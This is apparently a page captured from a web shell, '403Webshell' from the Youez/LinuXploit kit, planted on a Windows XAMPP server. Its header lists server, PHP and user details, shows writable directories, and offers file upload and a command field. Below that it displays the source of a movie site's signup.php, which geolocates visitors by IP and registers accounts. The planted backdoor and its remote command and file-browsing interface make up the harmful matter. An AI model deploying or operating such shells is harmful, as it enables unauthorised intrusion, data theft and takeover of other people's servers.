403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT DESKTOP-3H4FHQJ 10.0 build 19045 (Windows 10) AMD64
User : win 10 ( 0)
PHP Version : 8.2.12
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  D:/xampp/htdocs-coblaa/Cinevaa/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : D:/xampp/htdocs-coblaa/Cinevaa/signup.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" href="http://craneblue.com/main_icon/crane log.png" />
    <title>Create CineStream Account</title>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap" rel="stylesheet">
    <link rel="stylesheet" type="text/css" href="main_css/signup.css" />
</head>
<body>

<?php 
session_start();
include('con_db.php'); 

// 1. Get User IP
$user_ip = getenv('REMOTE_ADDR');

// 2. Localhost Fix: If you're testing locally, use a fake public IP to see it work
if ($user_ip == '127.0.0.1' || $user_ip == '::1') {
    $user_ip = '8.8.8.8'; // Google's IP (California, USA) for testing purposes
}

// 3. Fetch Location via JSON (More reliable than unserialize)
$api_url = "http://ip-api.com/json/" . $user_ip;
$response = @file_get_contents($api_url);
$geo = json_decode($response, true);

// 4. Set Variables with Fallbacks
if ($geo && $geo['status'] === 'success') {
    $city = $geo["city"];
    $region = $geo["regionName"];
    $country = $geo["country"];
} else {
    $city = "Unknown City";
    $region = "Unknown Region";
    $country = "Unknown Country";
}

?>

<div class="auth-card">
    <div class="title">CineStream</div>
    <div class="subtitle">Join the community of movie lovers</div>

    <form method="post" id="signupForm">
        <div class="form-group">
            <input type="text" id="fname" name="create_acc_fname" class="create_acc_input" placeholder="First Name" required>
        </div>
        <div class="form-group">
            <input type="text" id="lname" name="create_acc_lname" class="create_acc_input" placeholder="Last Name" required>
        </div>
        <div class="form-group">
            <input type="password" id="pass" name="create_acc_password" class="create_acc_input" placeholder="Password" required>
        </div>
        <div class="form-group">
            <input type="password" id="confirm_pass" class="create_acc_input" placeholder="Confirm Password" required>
        </div>

        <div id="create_output">
            <?php
            if (isset($_POST['create_acc_btn'])) {
                $user_fname = mysqli_real_escape_string($conn, $_POST['create_acc_fname']);
                $user_lname = mysqli_real_escape_string($conn, $_POST['create_acc_lname']);
                $create_acc_password = $_POST['create_acc_password'];
                
                // 1. Hash the password
                $hashed_password = password_hash($create_acc_password, PASSWORD_DEFAULT);

                // 2. Check if IP already registered
                $stmt_ip = mysqli_prepare($conn, "SELECT id FROM cb_userstb WHERE ipuser = ?");
                mysqli_stmt_bind_param($stmt_ip, "s", $user_ip);
                mysqli_stmt_execute($stmt_ip);
                mysqli_stmt_store_result($stmt_ip);

                // 3. Check if Full Name already exists
                $stmt_name = mysqli_prepare($conn, "SELECT id FROM cb_userstb WHERE fname = ? AND lname = ?");
                mysqli_stmt_bind_param($stmt_name, "ss", $user_fname, $user_lname);
                mysqli_stmt_execute($stmt_name);
                mysqli_stmt_store_result($stmt_name);

                if (mysqli_stmt_num_rows($stmt_ip) > 0) {
                    echo "<div style='color:#ff4d4d;'>This device is already registered.</div>";
                } 
                elseif (mysqli_stmt_num_rows($stmt_name) > 0) {
                    echo "<div style='color:#ff4d4d;'>Username already exists. Please try another name.</div>";
                } 
                else {
                    // 4. Insert new user
                    $insert_query = "INSERT INTO cb_userstb (fname, lname, password, profile_image, ipuser, curr_country, curr_city, curr_date, curr_time) 
                                     VALUES (?, ?, ?, 'avatar2.jpg', ?, ?, ?, CURDATE(), CURTIME())";
                    
                    $stmt_insert = mysqli_prepare($conn, $insert_query);
                    mysqli_stmt_bind_param($stmt_insert, "ssssss", $user_fname, $user_lname, $hashed_password, $user_ip, $country, $city);
                    
                    if (mysqli_stmt_execute($stmt_insert)) {
                        $user_id = mysqli_insert_id($conn);
                        $new_id = 'CB' . $user_id;

                        // Update with custom ID
                        $update_stmt = mysqli_prepare($conn, "UPDATE cb_userstb SET my_id = ? WHERE id = ?");
                        mysqli_stmt_bind_param($update_stmt, "si", $new_id, $user_id);
                        mysqli_stmt_execute($update_stmt);

                        $_SESSION['my_id'] = $new_id;
                        echo "<div style='color:green;'>Registration Successful! Redirecting...</div>";
                        echo "<script>setTimeout(() => { window.location.href = 'index.php'; }, 2000);</script>";
                    } else {
                        echo "<div style='color:red;'>Something Went Wrong.</div>";
                    }
                }
            }
            ?>
        </div>

        <button type="button" id="check_btn" onclick="validateForm()" class="btn-primary">Next</button>
        <button type="submit" id="submit_btn" name="create_acc_btn" class="btn-primary" style="display:none;">Create Account</button>
    </form>

    <a href="login.php" class="secondary-link" style="display:block; margin-top:15px; text-align:center;">Already have an account? Log in</a>
</div>

<script>
function validateForm() {
    const fname = document.getElementById('fname').value.trim();
    const lname = document.getElementById('lname').value.trim();
    const pass = document.getElementById('pass').value;
    const confirm = document.getElementById('confirm_pass').value;
    const output = document.getElementById('create_output');

    if(!fname || !lname || !pass || !confirm) {
        output.innerHTML = "<span style='color:#ff4d4d;'>Please fill all fields.</span>";
        return;
    }

    if(pass.length < 6) {
        output.innerHTML = "<span style='color:#ff4d4d;'>Password must be 6+ characters.</span>";
        return;
    }

    if(pass !== confirm) {
        output.innerHTML = "<span style='color:#ff4d4d;'>Passwords do not match.</span>";
        return;
    }

    // Success: Switch buttons
    output.innerHTML = "";
    document.getElementById('check_btn').style.display = "none";
    document.getElementById('submit_btn').style.display = "block";
}
</script>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit